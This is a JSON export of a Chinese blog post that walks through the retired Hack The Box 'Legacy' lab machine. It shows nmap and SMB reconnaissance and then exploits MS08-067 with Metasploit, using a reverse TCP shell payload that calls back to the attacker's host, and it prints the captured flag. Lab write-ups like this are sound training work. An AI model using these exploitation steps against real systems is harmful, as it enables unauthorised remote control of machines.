{"id":163,"date":"2024-11-13T10:42:06","date_gmt":"2024-11-13T02:42:06","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=163"},"modified":"2024-11-13T10:42:07","modified_gmt":"2024-11-13T02:42:07","slug":"163","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/163\/","title":{"rendered":"HTB\u9776\u673a Legacy \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.4<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.4 (10.10.10.4) 56(84) bytes of data.\n64 bytes from 10.10.10.4: icmp_seq=1 ttl=127 time=111 ms\n64 bytes from 10.10.10.4: icmp_seq=2 ttl=127 time=104 ms\n64 bytes from 10.10.10.4: icmp_seq=3 ttl=127 time=110 ms\n64 bytes from 10.10.10.4: icmp_seq=4 ttl=127 time=113 ms\n\n--- 10.10.10.4 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3297ms\nrtt min\/avg\/max\/mdev = 104.377\/109.679\/112.668\/3.180 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u6001\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 13 21:56:57 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.4\nNmap scan report for 10.10.10.4 (10.10.10.4)\nHost is up (0.12s latency).\nAll 65535 scanned ports on 10.10.10.4 (10.10.10.4) are in ignored states.\nNot shown: 65535 closed tcp ports (reset)\n\n# Nmap done at Fri Sep 13 21:57:47 2024 -- 1 IP address (1 host up) scanned in 49.09 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u7b56\u7565\uff0c\u76f4\u63a5\u8fdb\u884c<code>TCP<\/code>\u5168\u7aef\u53e3\u626b\u63cf\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 13 22:00:38 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.4\nNmap scan report for 10.10.10.4 (10.10.10.4)\nHost is up (0.12s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT    STATE SERVICE      VERSION\n135\/tcp open  msrpc        Microsoft Windows RPC\n139\/tcp open  netbios-ssn  Microsoft Windows netbios-ssn\n445\/tcp open  microsoft-ds Windows XP microsoft-ds\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.94SVN%E=4%D=9\/13%OT=135%CT=1%CU=30355%PV=Y%DS=2%DC=T%G=Y%TM=66E\nOS:445D7%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=I%II=I%SS=S%TS=0\nOS:)SEQ(SP=104%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%TS=0)OPS(O1=M53CNW0NNT00NN\nOS:S%O2=M53CNW0NNT00NNS%O3=M53CNW0NNT00%O4=M53CNW0NNT00NNS%O5=M53CNW0NNT00N\nOS:NS%O6=M53CNNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)E\nOS:CN(R=Y%DF=Y%T=80%W=FAF0%O=M53CNW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F\nOS:=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=8\nOS:0%W=FAF0%S=O%A=S+%F=AS%O=M53CNW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=\nOS:A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T5(R=Y\nOS:%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R\nOS:%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=\nOS:80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)\n\nNetwork Distance: 2 hops\nService Info: OSs: Windows, Windows XP; CPE: cpe:\/o:microsoft:windows, cpe:\/o:microsoft:windows_xp\n\nHost script results:\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: LEGACY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 00:50:56:b9:30:d4 (VMware)\n|_smb2-time: Protocol negotiation failed (SMB2)\n| smb-os-discovery: \n|   OS: Windows XP (Windows 2000 LAN Manager)\n|   OS CPE: cpe:\/o:microsoft:windows_xp::-\n|   Computer name: legacy\n|   NetBIOS computer name: LEGACYx00\n|   Workgroup: HTBx00\n|_  System time: 2024-09-18T18:49:04+03:00\n|_clock-skew: mean: 5d00h17m17s, deviation: 2h07m16s, median: 4d22h47m17s\n\nTRACEROUTE (using port 199\/tcp)\nHOP RTT       ADDRESS\n1   112.94 ms 10.10.14.1 (10.10.14.1)\n2   146.73 ms 10.10.10.4 (10.10.10.4)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Sep 13 22:01:59 2024 -- 1 IP address (1 host up) scanned in 81.28 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 13 22:03:53 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.4\nWarning: 10.10.10.4 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.4 (10.10.10.4)\nHost is up (0.11s latency).\nNot shown: 65527 closed udp ports (port-unreach)\nPORT     STATE         SERVICE\n123\/udp  open          ntp\n137\/udp  open          netbios-ns\n138\/udp  open|filtered netbios-dgm\n445\/udp  open|filtered microsoft-ds\n500\/udp  open|filtered isakmp\n1025\/udp open|filtered blackjack\n1900\/udp open|filtered upnp\n4500\/udp open|filtered nat-t-ike\n\n# Nmap done at Fri Sep 13 22:04:42 2024 -- 1 IP address (1 host up) scanned in 48.62 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 13 22:08:19 2024 as: nmap -sC -sU -sV -A -p 123,137,138,445,500,1025,1900,4500 -oN .\/udp_report.txt 10.10.10.4\nNmap scan report for 10.10.10.4 (10.10.10.4)\nHost is up (0.14s latency).\n\nPORT     STATE         SERVICE      VERSION\n123\/udp  open          ntp          Microsoft NTP\n| ntp-info: \n|_  \n137\/udp  open          netbios-ns   Microsoft Windows netbios-ns (workgroup: HTB)\n| nbns-interfaces: \n|   hostname: LEGACY\n|   interfaces: \n|_    10.10.10.4\n138\/udp  open|filtered netbios-dgm\n445\/udp  open|filtered microsoft-ds\n500\/udp  open|filtered isakmp\n1025\/udp open|filtered blackjack\n1900\/udp open|filtered upnp\n4500\/udp open|filtered nat-t-ike\nToo many fingerprints match this host to give specific OS details\nNetwork Distance: 2 hops\nService Info: Host: LEGACY; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_nbstat: NetBIOS name: LEGACY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 00:50:56:b9:30:d4 (VMware)\n|_clock-skew: 5d01h47m21s\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   105.64 ms 10.10.14.1 (10.10.14.1)\n2   105.90 ms 10.10.10.4 (10.10.10.4)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Sep 13 22:12:03 2024 -- 1 IP address (1 host up) scanned in 224.01 seconds<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows XP<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>MSRPC\u670d\u52a1\uff08135\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>impakcet-rpcdump<\/code>\u5de5\u5177\u5bf9<code>135<\/code>\u7aef\u53e3\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-rpcdump -p 135 10.10.10.4<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726278301523-b487705d-4de6-4925-b26e-6a51b7a5c4e4.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a\u62d2\u7edd\u4e86\u670d\u52a1\u5217\u8868\u67e5\u8be2\u3002<\/p>\n<h2>SMB\u670d\u52a1<\/h2>\n<p>\u4f7f\u7528<code>nbtscan<\/code>\u5de5\u5177\u786e\u5b9a\u5176<code>NetBIOS<\/code>\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">nbtscan 10.10.10.4<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726279561580-ded72877-78d6-4a6c-9464-a996d829a6a8.png\" alt=\"\" \/><\/p>\n<p>\u4f7f\u7528<code>Nmap<\/code>\u811a\u672c\u5bf9\u5176\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap -sS --script=\"smb-vuln*\" -p 139,445 -oN .\/smb_result.txt 10.10.10.4<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726280998145-00bcfecf-dcd5-4a76-9d1b-8994d0e1f1c0.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a<code>SMB<\/code>\u670d\u52a1\u5b58\u5728\u77e5\u540d\u6f0f\u6d1e<code>MS08-067<\/code>\u3002\u76f4\u63a5\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002<\/p>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>MS08-067\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u542f\u52a8<code>Metasploit<\/code>\uff0c\u641c\u7d22<code>MS08-067<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726282490733-ec4ca8b8-483e-4421-a2a1-27970ca79c6b.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u9009\u7528<code>1<\/code>\u53f7\u6a21\u5757\uff0c\u914d\u7f6e\u53c2\u6570\uff1a<\/p>\n<pre><code class=\"language-shell\">use 1\nset payload payload\/windows\/shell\/reverse_tcp\nset RHOSTS 10.10.10.4\nset LHOST 10.10.14.4\nset LPORT 443<\/code><\/pre>\n<p>\u968f\u540e\u6267\u884c<code>run<\/code>\u547d\u4ee4\u653b\u51fb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726282709841-99ecb8da-0ace-4530-bbd9-34ec2a247206.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<pre><code class=\"language-plain\">993442d258b0e0ec917cae9e695d5713<\/code><\/pre>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.4 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.4 (10.10.10.4) 56( &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-163","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=163"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/163\/revisions"}],"predecessor-version":[{"id":164,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/163\/revisions\/164"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}